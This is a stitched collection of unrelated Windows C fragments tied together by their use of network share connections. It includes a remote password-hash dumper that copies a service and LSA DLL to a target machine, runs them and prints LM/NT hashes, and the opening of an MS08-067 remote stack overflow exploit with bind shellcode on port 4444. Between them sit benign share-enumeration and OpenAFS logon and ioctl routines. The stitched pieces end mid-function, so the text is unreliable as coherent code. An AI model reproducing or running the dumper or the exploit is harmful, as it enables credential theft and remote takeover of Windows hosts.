sprintf(szFullServicePath, "%s\\servpw.exe", szCurrentDir);*/
}
else
{
try
{
// connect to machine
NETRESOURCE rec;
int rc;
rec.dwType = RESOURCETYPE_DISK;
rec.lpLocalName = NULL;
rec.lpProvider = NULL;
szWritableShare = (char*)malloc(MAX_PATH + 1);
szWritableSharePhysical = (char*)malloc(MAX_PATH + 1);
memset(szWritableShare, 0, MAX_PATH + 1);
memset(szWritableSharePhysical, 0, MAX_PATH + 1);
GetModuleFileName(NULL, localPath, MAX_PATH);
if (szSelectedShareName == NULL)
{
// Need to establish a connection to enumerate shares sometimes
sprintf(resourceName, "%s\\IPC$", machineName);
rec.lpRemoteName = resourceName;
rc = WNetAddConnection2(&rec, password, userName, 0);
if(rc != ERROR_SUCCESS)
{
sprintf(errMsg, "Logon to %s failed: error %d\n", resourceName, rc);
throw errMsg;
}
if (!GetAvailableWriteableShare(machineName, MAX_PATH, &szWritableSharePhysical, MAX_PATH, &szWritableShare))
{
sprintf(errMsg, "Unable to find writable share on %s\n", machineName);
throw errMsg;
}
}
else
{
// For a known share, connect first to establish a trusted connection, then get details about the share
sprintf(resourceName, "%s\\%s", machineName, szSelectedShareName);
rec.lpRemoteName = resourceName;
rc = WNetAddConnection2(&rec, password, userName, 0);
if(rc != ERROR_SUCCESS)
{
sprintf(errMsg, "Logon to %s failed: error %d\n", resourceName, rc);
throw errMsg;
}
if (!CanUpload(resourceName))
{
sprintf(errMsg, "Failed to upload to the specified share on %s\n", machineName);
throw errMsg;
}
if (!GetPhysicalPathForShare(machineName, szSelectedShareName, &szWritableSharePhysical, MAX_PATH))
{
sprintf(errMsg, "Failed to get the physical path for the specified share on %s\n", machineName);
throw errMsg;
}
strncpy(szWritableShare, resourceName, MAX_PATH);
}
if (strlen(szWritableShare) <= 0 || strlen(szWritableSharePhysical) <= 0/* || strlen(szLocalDrive) <= 0*/)
{
sprintf(errMsg, "Unable to find a writable share on %s\n", machineName);
throw errMsg;
}
sprintf(szRemoteServicePath, "%s\\%s.exe", szWritableSharePhysical, szServiceFileName);
sprintf(szRemoteLsaExtPath, "%s\\%s.dll", szWritableSharePhysical, szLsaExtFileName);
// Copy dll file to remote machine
/*strcpy(rDllname, szWritableShare);
if (bIs64Bit)
{
strcpy(strrchr(localPath, '\\') + 1, "lsremora64.dll");
strcat(rDllname, "\\lsremora64.dll");
}
else
{
strcpy(strrchr(localPath, '\\') + 1, "lsremora.dll");
strcat(rDllname, "\\lsremora.dll");
}*/
strncpy(szDestinationServicePath, szWritableShare, MAX_PATH);
strncat(szDestinationServicePath, "\\", 1);
strncat(szDestinationServicePath, szServiceFileName, MAX_PATH);
strncat(szDestinationServicePath, ".exe", 4);
// Uh, why not just COPY the file rather than its stream?
if (!CopyFile(szFullLocalServicePath, szDestinationServicePath, FALSE))
{
sprintf(errMsg, "Couldn't copy %s to destination %s. (Error %d)\n", szRemoteServicePath, szDestinationServicePath, GetLastError());
throw errMsg;
}
// Copy the service file to remote machine
/*if (bIs64Bit)
strcpy(strrchr(localPath, '\\') + 1, "servpw64.exe");
else
strcpy(strrchr(localPath, '\\') + 1, "servpw.exe");
strcpy(rExename, szWritableShare);
strcat(rExename, "\\");
strcat(rExename, szServiceFileName);
strcat(rExename, ".exe");*/
strncpy(szDestinationDllPath, szWritableShare, MAX_PATH);
strncat(szDestinationDllPath, "\\", 1);
strncat(szDestinationDllPath, szLsaExtFileName, MAX_PATH);
strncat(szDestinationDllPath, ".dll", 4);
if (!CopyFile(szFullLocalLsaExtPath, szDestinationDllPath, FALSE))
{
sprintf(errMsg, "Couldn't copy %s to destination %s.\n", szRemoteLsaExtPath, szDestinationDllPath);
throw errMsg;
}
}
catch(char* msg)
{
WNetCancelConnection2(resourceName, 0, false);
if(msg)
printf(msg);
if(outfile)
fclose(outfile);
if (szWritableShare != NULL)
free(szWritableShare);
if (szWritableSharePhysical != NULL)
free(szWritableSharePhysical);
#ifdef _DEBUG
printf("Press return to exit...\n");
scanf("...");
#endif
return -1;
}
}
try
{
// Need to create a guid for the pipe name
memset(wszGUID, 0, CHARS_IN_GUID + 1);
memset(szGUID, 0, CHARS_IN_GUID + 1);
CoCreateGuid(&guidPipe);
StringFromGUID2(guidPipe, wszGUID, CHARS_IN_GUID);
wsprintf(szGUID, "%ls", wszGUID);
// establish the service on remote machine
if (!bIsLocalRun)
hscm = OpenSCManager(machineName, NULL, SC_MANAGER_CREATE_SERVICE); // Remote service connection
else
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE); // Local service connection
if(!hscm)
{
sprintf(errMsg, "Failed to open SCM\n");
throw errMsg;
}
CoCreateGuid(&guidPipe);
StringFromGUID2(guidPipe, wszGUID, CHARS_IN_GUID);
wsprintf(szGUIDServiceName, "%ls", wszGUID);
// Give the service a GUID name
//strncpy(szServiceFileName, "servpw", MAX_PATH);
//printf("My service file name is: %s\n", szServiceFileName);
hsvc = CreateService(hscm, szServiceFileName, szGUIDServiceName, SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE,
szRemoteServicePath, NULL, NULL, NULL, NULL, NULL);
if(!hsvc)
{
int n = GetLastError();
hsvc = OpenService(hscm, szServiceFileName, SERVICE_ALL_ACCESS);
if(!hsvc)
{
sprintf(errMsg, "Failed to create service (%s/%s), error %d\n", szFullServicePath, szGUIDServiceName, GetLastError());
throw errMsg;
}
}
// Open named pipe
hThread = _beginthreadex(NULL, 0, (unsigned (_stdcall *)(void *))NamedPipeThread, (void*)machineName, 0, (unsigned*)&nThreadID);
if (hThread == NULL)
{
sprintf(errMsg, "Unable to create named pipe thread, error %d\n", GetLastError());
throw errMsg;
}
// Create a 16 byte encryption key
// ** THIS IS NOT A CRYPTOGRAPHICALLY STRONG SOLUTION!!!! **
// You have been warned
LARGE_INTEGER liSeed;
pEncryptionKey = (BYTE*)malloc(16);
for (i = 0; i < 16; i++)
{
QueryPerformanceCounter(&liSeed);
srand(liSeed.LowPart);
pEncryptionKey[i] = rand() & 0xff;
// HACK FIX!!! //
// Encryption breaks if there is a zero byte in the key //
if (pEncryptionKey[i] == 0)
pEncryptionKey[i] = 1;
//pEncryptionKey[i] = 1;
}
// Set up service params. Need to set up a temporary char array so that
// non-strings can be null-terminated.
char szTemp1[2], szTemp2[2];
memset(szTemp1, 0, 2);
memset(szTemp2, 0, 2);
dwLen = 16;
varg[0] = szGUID;
varg[1] = (char*)pEncryptionKey;
varg[4] = szServiceFileName;
varg[5] = szRemoteLsaExtPath;
varg[6] = szCurrentDir;
if (setPasswordHash) {
varg[7] = "set";
} else {
varg[7] = "dump";
}
memcpy(szTemp1, &dwLen, 1);
varg[2] = szTemp1;
szTemp2[0] = (char)bSkipHistories;
varg[3] = szTemp2;
Blowfish_Init(&ctx, pEncryptionKey, dwLen);
if(!StartService(hsvc, 8, (const char**)varg))
{
sprintf(errMsg, "Service start failed: %d (%s/%s)\n", GetLastError(), szRemoteServicePath, szGUIDServiceName);
throw errMsg;
}
// when the executable is finished running, it can be deleted - clean up
BOOL bRet;
for(i = 0; ; i++)
{
if(i == 99)
fprintf(stderr, "Waiting for remote service to terminate...\n");
else if(i == 199)
fprintf(stderr, "Servers with many user accounts can take several minutes\n");
else if(i % 100 == 99)
fprintf(stderr, ".");
Sleep(100);
if (szDestinationServicePath[0] != 0)
{
if(DeleteFile(szDestinationServicePath))
break;
}
else
{
// If we're running locally, just query the service's status
bRet = QueryServiceStatus(hsvc, &statusService);
if (!bRet)
{
fprintf(stderr, "Unable to query service status. Something is wrong, please manually check the status of servpw\n");
break;
}
if (statusService.dwCurrentState == SERVICE_STOPPED)
break;
}
}
fprintf(stderr, "\n");
if (szDestinationDllPath[0] != 0)
{
if(!DeleteFile(szDestinationDllPath))
fprintf(stderr, "Couldn't delete target executable from remote machine: %d\n", GetLastError());
}
WaitForSingleObject((void*)hThread, INFINITE);
// Go through each structure and output the password data
if (lpUserInfoArray == NULL)
{
printf("No data returned from the target host\n");
}
else
{
USERINFO* pTemp;
wchar_t LMdata[40];
wchar_t NTdata[40];
wchar_t *p;
int i;
for (unsigned long index = 0; index < nUserInfoArraySize; index++)
{
pTemp = lpUserInfoArray + index;
DWORD* dwdata = (DWORD*)(pTemp->cHash);
// Get LM hash
if((dwdata[4] == 0x35b4d3aa) && (dwdata[5] == 0xee0414b5) &&
(dwdata[6] == 0x35b4d3aa) && (dwdata[7] == 0xee0414b5))
{
swprintf(LMdata, L"NO PASSWORD*********************");
}
else
{
for(i = 16, p = LMdata; i < 32; i++, p += 2)
{
swprintf(p, L"%02X", pTemp->cHash[i] & 0xFF);
}
}
// Get NT hash
if((dwdata[0] == 0xe0cfd631) && (dwdata[1] == 0x31e96ad1) &&
(dwdata[2] == 0xd7593cb7) && (dwdata[3] == 0xc089c0e0))
{
swprintf(NTdata, L"NO PASSWORD*********************");
}
else
{
for(i = 0, p = NTdata; i < 16; i++, p += 2)
{
swprintf(p, L"%02X", pTemp->cHash[i] & 0xFF);
}
}
// display data in L0phtCrack-compatible format
// Try converting data to Unicode
fwprintf(outfile, L"%ls:%ls%ls\n", pTemp->wszUser, NTdata, LMdata);
}
}
throw "Completed.\n";
}
// clean up
catch(char* msg)
{
if (pEncryptionKey != NULL)
{
memset(pEncryptionKey, 0, 16);
free(pEncryptionKey);
}
if (lpUserInfoArray != NULL)
GlobalFree(lpUserInfoArray);
if(hsvc)
{
DeleteService(hsvc);
CloseServiceHandle(hsvc);
}
if(hscm)
CloseServiceHandle(hscm);
if (resourceName[0] != 0)
WNetCancelConnection2(resourceName, 0, false);
if(msg) {
// Do not print the completed message
if (strcmp(msg, "Completed.\n")) {
printf(msg);
}
}
if(outfile)
fclose(outfile);
if (szWritableShare != NULL)
free(szWritableShare);
if (szWritableSharePhysical != NULL)
free(szWritableSharePhysical);
}
#ifdef _DEBUG
printf("Press return to exit...\n");
scanf("...");
#endif
return 0;
}
bool CWfpNET::NetBIOSShares_get(void)
{
DWORD i = 0, entriesread = 0, resume_handle = 0, totalentries = 0;
PSHARE_INFO_1 pBuf = NULL, pTmpBuf = NULL;
NET_API_STATUS nStatus = NULL;
NETRESOURCE nr;
CString tmp, tmp2;
bool accessible = false;
// The NetShareEnum function retrieves information about each shared
// resource on a server.
// No special group membership is required for level 0 or level 1 calls.
do{
nStatus = NetShareEnum(node.szComputerW, 1, (LPBYTE *) &pBuf,
0xFFFFFFFF, &entriesread, &totalentries, &resume_handle);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA)
{
if((pTmpBuf = pBuf) != NULL)
{
for(i = 0; i < entriesread; i++)
{
if(node.NetBIOS.IsEmpty()) {
tmp.Format(_T("\\\\%s\\%S"),
node.ipaddress, pTmpBuf->shi1_netname);
}
else {
tmp.Format(_T("\\\\%s\\%S"),
node.NetBIOS, pTmpBuf->shi1_netname);
}
if((pTmpBuf->shi1_type == STYPE_DISKTREE) &&
(options.optionopensharetest))
{
accessible = false;
//WNetCancelConnection2(_T("X:") ,CONNECT_UPDATE_PROFILE, TRUE);
nr.dwType = RESOURCETYPE_ANY;
//nr.lpLocalName = _T("X:");
nr.lpLocalName = NULL;
nr.lpRemoteName = tmp.GetBuffer();
nr.lpProvider = NULL;
if(WNetAddConnection2(&nr, NULL, NULL, FALSE) == NO_ERROR)
{
accessible = true;
//WNetCancelConnection2(_T("X:") ,CONNECT_UPDATE_PROFILE, TRUE);
WNetCancelConnection2(tmp.GetBuffer() ,CONNECT_UPDATE_PROFILE, TRUE);
}
}
tmp2.Format("%s %S %s", tmp, pTmpBuf->shi1_remark,
(accessible) ? "accessible with current credentials" : "");
NetBIOSShares.Add(tmp2);
pTmpBuf++;
}
}
if(pBuf != NULL)
{
NetApiBufferFree(pBuf);
pBuf = NULL;
}
}
else
{
// Silence Errors
// NetErrorHandler("NetShareEnum", nStatus);
return false;
}
}while (nStatus==ERROR_MORE_DATA);
return true;
}
VOID AFS_Logon_Event( PWLX_NOTIFICATION_INFO pInfo )
{
TCHAR profileDir[1024] = TEXT("");
DWORD len = 1024;
PTOKEN_USER tokenUser = NULL;
DWORD retLen;
WCHAR szUserW[128] = L"";
char szUserA[128] = "";
char szClient[MAX_PATH];
char szPath[MAX_PATH] = "";
NETRESOURCE nr;
DWORD res;
DWORD dwSize;
LogonOptions_t opt;
/* Make sure the AFS Libraries are initialized */
AfsLogonInit();
DebugEvent0("AFS_Logon_Event - Start");
DebugEvent("AFS_Logon_Event Process ID: %d",GetCurrentProcessId());
memset(&opt, 0, sizeof(LogonOptions_t));
if (pInfo->UserName && pInfo->Domain) {
char username[MAX_USERNAME_LENGTH] = "";
char domain[MAX_DOMAIN_LENGTH] = "";
size_t szlen = 0;
DebugEvent0("AFS_Logon_Event - pInfo UserName and Domain");
StringCchLengthW(pInfo->UserName, MAX_USERNAME_LENGTH, &szlen);
WideCharToMultiByte(CP_UTF8, 0, pInfo->UserName, szlen,
username, sizeof(username), NULL, NULL);
StringCchLengthW(pInfo->Domain, MAX_DOMAIN_LENGTH, &szlen);
WideCharToMultiByte(CP_UTF8, 0, pInfo->Domain, szlen,
domain, sizeof(domain), NULL, NULL);
DebugEvent0("AFS_Logon_Event - Calling GetDomainLogonOptions");
GetDomainLogonOptions(NULL, username, domain, &opt);
} else {
if (!pInfo->UserName)
DebugEvent0("AFS_Logon_Event - No pInfo->UserName");
if (!pInfo->Domain)
DebugEvent0("AFS_Logon_Event - No pInfo->Domain");
}
DebugEvent("AFS_Logon_Event - opt.LogonOption = %lX opt.flags = %lX",
opt.LogonOption, opt.flags);
if (!ISLOGONINTEGRATED(opt.LogonOption) || !ISREMOTE(opt.flags)) {
DebugEvent0("AFS_Logon_Event - Logon is not integrated or not remote");
goto done_logon_event;
}
DebugEvent0("AFS_Logon_Event - Calling GetTokenInformation");
if (!GetTokenInformation(pInfo->hToken, TokenUser, NULL, 0, &retLen))
{
if ( GetLastError() == ERROR_INSUFFICIENT_BUFFER ) {
tokenUser = (PTOKEN_USER) LocalAlloc(LPTR, retLen);
if (!GetTokenInformation(pInfo->hToken, TokenUser, tokenUser, retLen, &retLen))
{
DebugEvent("AFS_Logon_Event - GetTokenInformation failed: GLE = %lX", GetLastError());
}
}
}
/* We can't use pInfo->Domain for the domain since in the cross realm case
* this is source domain and not the destination domain.
*/
if (tokenUser && QueryAdHomePathFromSid( profileDir, sizeof(profileDir), tokenUser->User.Sid, pInfo->Domain)) {
WCHAR Domain[64]=L"";
GetLocalShortDomain(Domain, sizeof(Domain));
if (QueryAdHomePathFromSid( profileDir, sizeof(profileDir), tokenUser->User.Sid, Domain)) {
if (NetUserGetProfilePath(pInfo->Domain, pInfo->UserName, profileDir, len))
GetUserProfileDirectory(pInfo->hToken, profileDir, &len);
}
}
if (strlen(profileDir)) {
DebugEvent("AFS_Logon_Event - Profile Directory: %s", profileDir);
} else {
DebugEvent0("AFS_Logon_Event - Unable to load profile");
}
done_logon_event:
dwSize = sizeof(szUserA);
if (!KFW_AFS_get_lsa_principal(szUserA, &dwSize)) {
StringCbPrintfW(szUserW, sizeof(szUserW), L"%s\\%s", pInfo->Domain, pInfo->UserName);
WideCharToMultiByte(CP_ACP, 0, szUserW, -1, szUserA, MAX_PATH, NULL, NULL);
}
if (szUserA[0])
{
lana_GetNetbiosName(szClient, LANA_NETBIOS_NAME_FULL);
StringCbPrintf(szPath, sizeof(szPath), "\\\\%s", szClient);
DebugEvent("AFS_Logon_Event - Logon Name: %s", szUserA);
memset (&nr, 0x00, sizeof(NETRESOURCE));
nr.dwType=RESOURCETYPE_DISK;
nr.lpLocalName=0;
nr.lpRemoteName=szPath;
res = WNetAddConnection2(&nr,NULL,szUserA,0);
if (res)
DebugEvent("AFS_Logon_Event - WNetAddConnection2(%s,%s) failed: 0x%X",
szPath, szUserA,res);
else
DebugEvent0("AFS_Logon_Event - WNetAddConnection2() succeeded");
} else
DebugEvent("AFS_Logon_Event - User name conversion failed: GLE = 0x%X",GetLastError());
if ( tokenUser )
LocalFree(tokenUser);
DebugEvent0("AFS_Logon_Event - End");
}
static long
GetIoctlHandle(char *fileNamep, HANDLE * handlep)
{
HKEY hk;
char *drivep = NULL;
char netbiosName[MAX_NB_NAME_LENGTH]="AFS";
DWORD CurrentState = 0;
char HostName[64] = "";
char tbuffer[MAX_PATH]="";
HANDLE fh;
char szUser[128] = "";
char szClient[MAX_PATH] = "";
char szPath[MAX_PATH] = "";
NETRESOURCE nr;
DWORD res;
DWORD ioctlDebug = IoctlDebug();
DWORD gle;
DWORD dwAttrib;
DWORD dwSize = sizeof(szUser);
BOOL usingRDR = FALSE;
int saveerrno;
UINT driveType;
int sharingViolation;
memset(HostName, '\0', sizeof(HostName));
gethostname(HostName, sizeof(HostName));
if (!DisableServiceManagerCheck() &&
GetServiceStatus(HostName, TEXT("TransarcAFSDaemon"), &CurrentState) == NOERROR &&
CurrentState != SERVICE_RUNNING)
{
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl GetServiceStatus(%s) == %d\r\n",
HostName, CurrentState);
errno = saveerrno;
}
return -1;
}
if (RDR_Ready()) {
usingRDR = TRUE;
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl Redirector is ready\r\n");
errno = saveerrno;
}
if (RegOpenKey (HKEY_LOCAL_MACHINE, AFSREG_CLT_SVC_PARAM_SUBKEY, &hk) == 0)
{
DWORD dwSize = sizeof(netbiosName);
DWORD dwType = REG_SZ;
RegQueryValueExA (hk, "NetbiosName", NULL, &dwType, (PBYTE)netbiosName, &dwSize);
RegCloseKey (hk);
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl NetbiosName = \"%s\"\r\n", netbiosName);
errno = saveerrno;
}
} else {
if ( ioctlDebug ) {
saveerrno = errno;
gle = GetLastError();
fprintf(stderr, "pioctl Unable to open \"HKLM\\%s\" using NetbiosName = \"AFS\" GLE=0x%x\r\n",
HostName, CurrentState, gle);
errno = saveerrno;
}
}
} else {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl Redirector is not ready\r\n");
errno = saveerrno;
}
if (!GetEnvironmentVariable("AFS_PIOCTL_SERVER", netbiosName, sizeof(netbiosName)))
lana_GetNetbiosName(netbiosName,LANA_NETBIOS_NAME_FULL);
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl NetbiosName = \"%s\"\r\n", netbiosName);
errno = saveerrno;
}
}
if (fileNamep) {
drivep = strchr(fileNamep, ':');
if (drivep && (drivep - fileNamep) >= 1) {
tbuffer[0] = *(drivep - 1);
tbuffer[1] = ':';
tbuffer[2] = '\0';
driveType = GetDriveType(tbuffer);
switch (driveType) {
case DRIVE_UNKNOWN:
case DRIVE_REMOTE:
if (DriveIsMappedToAFS(tbuffer, netbiosName) ||
DriveIsGlobalAutoMapped(tbuffer))
strcpy(&tbuffer[2], SMB_IOCTL_FILENAME);
else
return -1;
break;
default:
if (DriveIsGlobalAutoMapped(tbuffer))
strcpy(&tbuffer[2], SMB_IOCTL_FILENAME);
else
return -1;
}
} else if (fileNamep[0] == fileNamep[1] &&
(fileNamep[0] == '\\' || fileNamep[0] == '/'))
{
int count = 0, i = 0;
while (count < 4 && fileNamep[i]) {
tbuffer[i] = fileNamep[i];
if ( tbuffer[i] == '\\' ||
tbuffer[i] == '/')
count++;
i++;
}
if (fileNamep[i] == 0 || (fileNamep[i-1] != '\\' && fileNamep[i-1] != '/'))
tbuffer[i++] = '\\';
tbuffer[i] = 0;
strcat(tbuffer, SMB_IOCTL_FILENAME_NOSLASH);
} else {
char curdir[MAX_PATH]="";
GetCurrentDirectory(sizeof(curdir), curdir);
if ( curdir[1] == ':' ) {
tbuffer[0] = curdir[0];
tbuffer[1] = ':';
tbuffer[2] = '\0';
driveType = GetDriveType(tbuffer);
switch (driveType) {
case DRIVE_UNKNOWN:
case DRIVE_REMOTE:
if (DriveIsMappedToAFS(tbuffer, netbiosName) ||
DriveIsGlobalAutoMapped(tbuffer))
strcpy(&tbuffer[2], SMB_IOCTL_FILENAME);
else
return -1;
break;
default:
if (DriveIsGlobalAutoMapped(tbuffer))
strcpy(&tbuffer[2], SMB_IOCTL_FILENAME);
else
return -1;
}
} else if (curdir[0] == curdir[1] &&
(curdir[0] == '\\' || curdir[0] == '/'))
{
int count = 0, i = 0;
while (count < 4 && curdir[i]) {
tbuffer[i] = curdir[i];
if ( tbuffer[i] == '\\' ||
tbuffer[i] == '/')
count++;
i++;
}
if (curdir[i] == 0 || (curdir[i-1] != '\\' && curdir[i-1] != '/'))
tbuffer[i++] = '\\';
tbuffer[i] = 0;
strcat(tbuffer, SMB_IOCTL_FILENAME_NOSLASH);
}
}
}
if (!tbuffer[0]) {
/* No file name starting with drive colon specified, use UNC name */
sprintf(tbuffer,"\\\\%s\\all%s",netbiosName,SMB_IOCTL_FILENAME);
}
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl filename = \"%s\"\r\n", tbuffer);
errno = saveerrno;
}
fflush(stdout);
/*
* Try to find the correct path and authentication
*/
dwAttrib = GetFileAttributes(tbuffer);
if (dwAttrib == INVALID_FILE_ATTRIBUTES) {
int gonext = 0;
gle = GetLastError();
if (gle && ioctlDebug ) {
char buf[4096];
saveerrno = errno;
if ( FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
gle,
MAKELANGID(LANG_ENGLISH,SUBLANG_ENGLISH_US),
buf,
4096,
NULL
) )
{
fprintf(stderr,"pioctl GetFileAttributes(%s) failed: 0x%X\r\n\t[%s]\r\n",
tbuffer,gle,buf);
}
errno = saveerrno;
SetLastError(gle);
}
/* with the redirector interface, fail immediately. there is nothing to retry */
if (usingRDR)
return -1;
if (!GetEnvironmentVariable("AFS_PIOCTL_SERVER", szClient, sizeof(szClient)))
lana_GetNetbiosName(szClient, LANA_NETBIOS_NAME_FULL);
if (RegOpenKey (HKEY_CURRENT_USER,
TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer"), &hk) == 0)
{
DWORD dwType = REG_SZ;
RegQueryValueEx (hk, TEXT("Logon User Name"), NULL, &dwType, (PBYTE)szUser, &dwSize);
RegCloseKey (hk);
}
if ( szUser[0] ) {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl Explorer logon user: [%s]\r\n",szUser);
errno = saveerrno;
}
sprintf(szPath, "\\\\%s", szClient);
memset (&nr, 0x00, sizeof(NETRESOURCE));
nr.dwType=RESOURCETYPE_DISK;
nr.lpLocalName=0;
nr.lpRemoteName=szPath;
res = WNetAddConnection2(&nr,NULL,szUser,0);
if (res) {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl WNetAddConnection2(%s,%s) failed: 0x%X\r\n",
szPath,szUser,res);
errno = saveerrno;
}
gonext = 1;
}
sprintf(szPath, "\\\\%s\\all", szClient);
res = WNetAddConnection2(&nr,NULL,szUser,0);
if (res) {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl WNetAddConnection2(%s,%s) failed: 0x%X\r\n",
szPath,szUser,res);
errno = saveerrno;
}
gonext = 1;
}
if (gonext)
goto try_lsa_principal;
dwAttrib = GetFileAttributes(tbuffer);
if (dwAttrib == INVALID_FILE_ATTRIBUTES) {
gle = GetLastError();
if (gle && ioctlDebug ) {
char buf[4096];
saveerrno = errno;
if ( FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
gle,
MAKELANGID(LANG_ENGLISH,SUBLANG_ENGLISH_US),
buf,
4096,
NULL
) )
{
fprintf(stderr,"pioctl GetFileAttributes(%s) failed: 0x%X\r\n\t[%s]\r\n",
tbuffer,gle,buf);
}
errno = saveerrno;
SetLastError(gle);
}
}
}
}
try_lsa_principal:
if (!usingRDR &&
dwAttrib == INVALID_FILE_ATTRIBUTES) {
int gonext = 0;
dwSize = sizeof(szUser);
if (GetLSAPrincipalName(szUser, dwSize)) {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl LSA Principal logon user: [%s]\r\n",szUser);
errno = saveerrno;
}
sprintf(szPath, "\\\\%s", szClient);
memset (&nr, 0x00, sizeof(NETRESOURCE));
nr.dwType=RESOURCETYPE_DISK;
nr.lpLocalName=0;
nr.lpRemoteName=szPath;
res = WNetAddConnection2(&nr,NULL,szUser,0);
if (res) {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl WNetAddConnection2(%s,%s) failed: 0x%X\r\n",
szPath,szUser,res);
errno = saveerrno;
}
gonext = 1;
}
sprintf(szPath, "\\\\%s\\all", szClient);
res = WNetAddConnection2(&nr,NULL,szUser,0);
if (res) {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl WNetAddConnection2(%s,%s) failed: 0x%X\r\n",
szPath,szUser,res);
errno = saveerrno;
}
gonext = 1;
}
if (gonext)
goto try_sam_compat;
dwAttrib = GetFileAttributes(tbuffer);
if (dwAttrib == INVALID_FILE_ATTRIBUTES) {
gle = GetLastError();
if (gle && ioctlDebug ) {
char buf[4096];
saveerrno = errno;
if ( FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
gle,
MAKELANGID(LANG_ENGLISH,SUBLANG_ENGLISH_US),
buf,
4096,
NULL
) )
{
fprintf(stderr,"pioctl GetFileAttributes(%s) failed: 0x%X\r\n\t[%s]\r\n",
tbuffer,gle,buf);
}
errno = saveerrno;
SetLastError(gle);
}
}
}
}
try_sam_compat:
if (!usingRDR &&
dwAttrib == INVALID_FILE_ATTRIBUTES) {
dwSize = sizeof(szUser);
if (GetUserNameEx(NameSamCompatible, szUser, &dwSize)) {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl SamCompatible logon user: [%s]\r\n",szUser);
errno = saveerrno;
}
sprintf(szPath, "\\\\%s", szClient);
memset (&nr, 0x00, sizeof(NETRESOURCE));
nr.dwType=RESOURCETYPE_DISK;
nr.lpLocalName=0;
nr.lpRemoteName=szPath;
res = WNetAddConnection2(&nr,NULL,szUser,0);
if (res) {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl WNetAddConnection2(%s,%s) failed: 0x%X\r\n",
szPath,szUser,res);
errno = saveerrno;
}
}
sprintf(szPath, "\\\\%s\\all", szClient);
res = WNetAddConnection2(&nr,NULL,szUser,0);
if (res) {
if ( ioctlDebug ) {
saveerrno = errno;
fprintf(stderr, "pioctl WNetAddConnection2(%s,%s) failed: 0x%X\r\n",
szPath,szUser,res);
errno = saveerrno;
}
return -1;
}
dwAttrib = GetFileAttributes(tbuffer);
if (dwAttrib == INVALID_FILE_ATTRIBUTES) {
gle = GetLastError();
if (gle && ioctlDebug ) {
char buf[4096];
saveerrno = errno;
if ( FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
gle,
MAKELANGID(LANG_ENGLISH,SUBLANG_ENGLISH_US),
buf,
4096,
NULL
) )
{
fprintf(stderr,"pioctl GetFileAttributes(%s) failed: 0x%X\r\n\t[%s]\r\n",
tbuffer,gle,buf);
}
errno = saveerrno;
}
return -1;
}
} else {
fprintf(stderr, "GetUserNameEx(NameSamCompatible) failed: 0x%X\r\n", GetLastError());
return -1;
}
}
if ( dwAttrib != (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM)) {
fprintf(stderr, "GetFileAttributes(%s) returned: 0x%08X\r\n",
tbuffer, dwAttrib);
return -1;
}
/* tbuffer now contains the correct path; now open the file */
sharingViolation = 0;
do {
if (sharingViolation)
Sleep(100);
fh = CreateFile(tbuffer, FILE_READ_DATA | FILE_WRITE_DATA,
FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_FLAG_WRITE_THROUGH, NULL);
sharingViolation++;
} while (fh == INVALID_HANDLE_VALUE &&
GetLastError() == ERROR_SHARING_VIOLATION &&
sharingViolation < 100);
fflush(stdout);
if (fh == INVALID_HANDLE_VALUE)
return -1;
/* return fh and success code */
*handlep = fh;
return 0;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
WSADATA wsa;
int bwritten=0;
BYTE rbuf[0x100]="";
DWORD dw;
PVOID ptr = (PVOID)&POP;
printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's [email protected] 2008/10/27\n" );
printf( "Thanks isno and PolyMeta\n" );
printf( "ShellCode Function: bindshell port:4444\n" );
printf( "usage:\n%s [IP]\n", argv[0] );
if ( argc != 2 ) {
return 0;
}
if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {
printf( "WSAStartup failed\n" );
return 0;
}
memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
printf( "connect %s ipc$ .... ", server );
if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {
printf( "failed\n" );
return 0;
} else {
printf( "success!\n" );
}
_snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server);
printf( "open \\\\%s\\pipe\\browser ....", server );
hFile = CreateFile( szPipe,
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == (HANDLE)-1 ) {
printf( "failed!\n" );
return 0;
} else {
printf( "success!\n" );
}
printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" );
